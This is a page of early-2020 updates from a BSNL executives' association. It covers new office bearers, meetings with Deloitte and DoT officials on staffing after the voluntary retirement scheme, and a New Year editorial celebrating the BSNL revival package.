Circle President: Com Suresh Bora, AGM.

Circle Secretary: Com Borun Baruah, JTO.

Treasurer: Com Allauddin Ahmed, AO.

The cooption become necessary as the earlier OBs opted for VRS 2019. SNEA recognizes their contribution for many years and wish them all the best.

SNEA CHQ wishes all the success for the newly elected young team.

 

03-01-2020

View Media Reports:

The state-controlled Bharat Sanchar Nigam Limited (BSNL) continues to be at a receiving end following bureaucratic uncertainties leading to an erosion of potential revenue opportunities on the back of Rs 20,000 crore-strong mega connectivity programs despite the Centre's thrust to revive the stressed telco . 

 

03-01-2020

03-01-2020

Interaction with the Consultant M/s Deloitte:

BSNL management arranged a meeting with the Consultant M/s Deloitte appointed for giving recommendations on continuity in BSNL services in the posts VRS scenario and the short term measures on 01/02/2020.

GS, President and both AGSs made a detailed discussion with the consultant for about two hours from 1600 Hrs to 1800 Hrs focussing on all the issues that may crop up in the post VRS scenario. The consultant identified acute shortage in DGM, AGM and TT(TM) cadres that will have impact after the VRS.

Discussions focused on the ground realities in field units, how it is going to affect after VRS, immediate measures to be taken to reduce the impact, customer relation in the post VRS scenario, merger of SSA and Circle, drawback of present BA structure, manpower requirement, motivation of staff, etc.

 

02-01-2020

02-01-2020

GS, President and AGSs met Secretary/DoT, Member(T)/DoT, Addl Secretary/DoT, CMD, DIR(HR), DIR(Fin), Jt Sec/DoT and other senior Officers of DoT on 01/01/2020, the new year and brief discussions. Discussions with CMD and DIR(HR) on important issues like restructuring and promotion is fixed for next week due to their busy schedule.

During the meeting with the Secretary/DoT we raised the issue of DGM(T) promotion which is stopped due to the reply given by Secretary/DoT in the meeting with the Parliamentary Committee that DGM promotion can be issued only after completion of restructuring (ie. after VRS). We explained that all the eligible DEs are getting promotion and there is no reservation involved in DE to DGM promotion and all the 287 DEs belongs to SC/ST category also getting covered. Among the DEs, more than 500 DEs applied for VRS and will miss the promotion if it is issued after 01/31/2020. We further bring to his notice that on 12/30/2019, even the CGM rank officers retiring on 12/31/2019 are given promotion and allowed to avail the promotion. But in the case of BSNL Executives just reverse happening.

After discussion Secretary informed that he is agreeable for DGM promotion provided: 1) it is not making any financial implications just before VRS and 2) it does not create any issue in similar frames. We explained that it does not have any financial implications and all are working in higher scales and will not create any issue in similar cadres as DGM promotion is held up after 2017 due to litigations.

Then Secretary assured us to discuss with CMD and if the information is correct, he will give permission for DGM promotion.

 

01-01-2020

01-01-2020

editorial

2019: Turbulent period in the history of BSNL. We successfully overcome it with unprecedented Unity and Solidarity

New Year unfolds new hopes with new challenges

In 2019, we had gone through turbulent times, never witnessed in the history of BSNL with agitations one after another demanding Revival of BSNL. It was really a do or die battle for the BSNL employees. Each and every committed member of SNEA dedicated the whole one year for the Revival of BSNL as each and every right thinking BSNL Executive was aware of the fact that his future is fully depending upon the future of BSNL. Unfortunately during this crucial period also some section of employees, especially some Executives kept away from the mainstream struggles as if collapse of BSNL is nothing to do with them. They have to realize the mistakes and join the mainstream, otherwise the Executives are to take a call to strengthen the mainstream, leaving those negative forces.

Yes, we had witnessed Repressive measures unleashed by the management and the Govt against the Associations and Unions to compel them to stop the agitations and struggles, allowing BSNL for its natural death by accepting defeat. But we never relented as we were made out of different stuff, ready for any sacrifice and ready to fight to the end, till we achieve our goal. Yes, it was a do or die battle for all of us which we have to win at any cost.

Initially, the Government was not at all serious on Revival of BSNL. All the Ministries were opposing the Revival Plan. Govt was waiting for the natural death of BSNL. Finance Ministry was so hostile, opposing any type of Revival package and insisting for the closure of BSNL and MTNL. Struggle, side by side with the successful efforts of BSNL employees to create public and media opinion in favor of BSNL Revival really worked wonders. SNEA was in the forefront of all such activities. The compulsion created by us for political intervention finally worked. Sincere efforts of Hon MoC and his efforts to form the GoM with the Home Minister as its Chairman coupled with the sincere efforts of both Secretaries/DoT and both CMDs/BSNL made things happen. Our efforts for the intervention of Hon Prime Minister and the final himself call by the Hon Prime Minister to give a good Revival package that will really help revival of BSNL was the most decisive factor.

Finally the BSNL and MTNL revival package was approved by Union Cabinet on 10/23/2019, giving a new lease of life to BSNL and MTNL. The package is having the real potential for the Revival of BSNL. 4G spectrum charges of Rs 14,155 Crores plus 18% GST will be borne by the Govt as demanded by us. From the beginning, AUAB demanded that Govt should allot free 4G spectrums to BSNL. Land monetization for clearing the liabilities and meeting the CAPEX also got the Cabinet approval. Our demand for financial assistance also materialized in the form of long term bond of 10 years for 15,000 Cr for BSNL and MTNL with Government sovereign guarantee. Our concern for merger of MTNL with BSNL, i.e. the huge financial liability, its status as a listed company and complex HR issues, are getting addressed before the merger takes place. The entire liability of about 15,000 Crores for VRS is borne by the Government as we were opposing any additional financial burden on BSNL in the name of VRS. Allotment of 5G spectrum is another favorite decision in the offing.

Each and every employee of BSNL, especially the Comrades of SNEA can cherish on this marvelous achievement, creating another history in the Trade Union movement. Yes Comrades, we created history by struggling shoulder to shoulder with other employees, for the Revival of the company, setting an example for other sectors. I am very proud and fortunate to be part of such a struggle and lead an Association of committed members by spearheading the struggle in the banner of AUAB, in the most difficult period. These are the memorable moments in life.

Now, we are at the doorsteps of 2020 with a lot of hopes and expectations. We are looking for positivity in BSNL. BSNL revival is the first among them.

4G launching on pan India basis on the allotted spectrum should not be delayed. The customers are eagerly waiting for that moment. Equally BSNL is answerable to the Govt also after the allotment of free 4G spectrum. Modernization of the network is to be expedited. Operational issues and clearing the outstanding dues to the labors, contractors, vendors, land owners etc are the immediate challenges to make any outsourcing model successful. BSNL has to regain the confidence among them by clearing their dues which will open the road for the future. Realizing the money through sovereign bond and land monetization are two important measures in that direction. Management has to come out of the VRS syndrome and start working on these issues to make it sure that BSNL is continue to provide uninterrupted services after 01/31/2020. Large number of loyal customers are really worried about the massive voluntary retirement and it is our responsibility to regain their confidence in the post VRS scenario. In this regard, management decisions will be very crucial.

In addition to the above issues, how management is going to motivate the remaining 47% employees to take the entire workload in the post VRS situation, how they are filling up the vacuum created in the field units which is generating revenue etc will have a huge impact on the efforts for the revival of BSNL. The shortage of Executives in higher level can be easily met by promotion which can be done within a couple of days by the new policy, simply by taking VC.

No more excuses can be made by DoT/Government and BSNL management in the name of employee cost as more than 50% employees took VRS, exceeding their target. We already warned management that unprofessional and drastic reduction in the Executives strength will have an adverse impact on the BSNL revival and good workers are to be retained in BSNL. All depends on how management is utilizing the remaining employees gainfully in the post VRS scenario. A professional approach and quick policy decisions can once again bring BSNL back on track.

Let us hope that 2020 will bring good news for BSNL and the entire nation.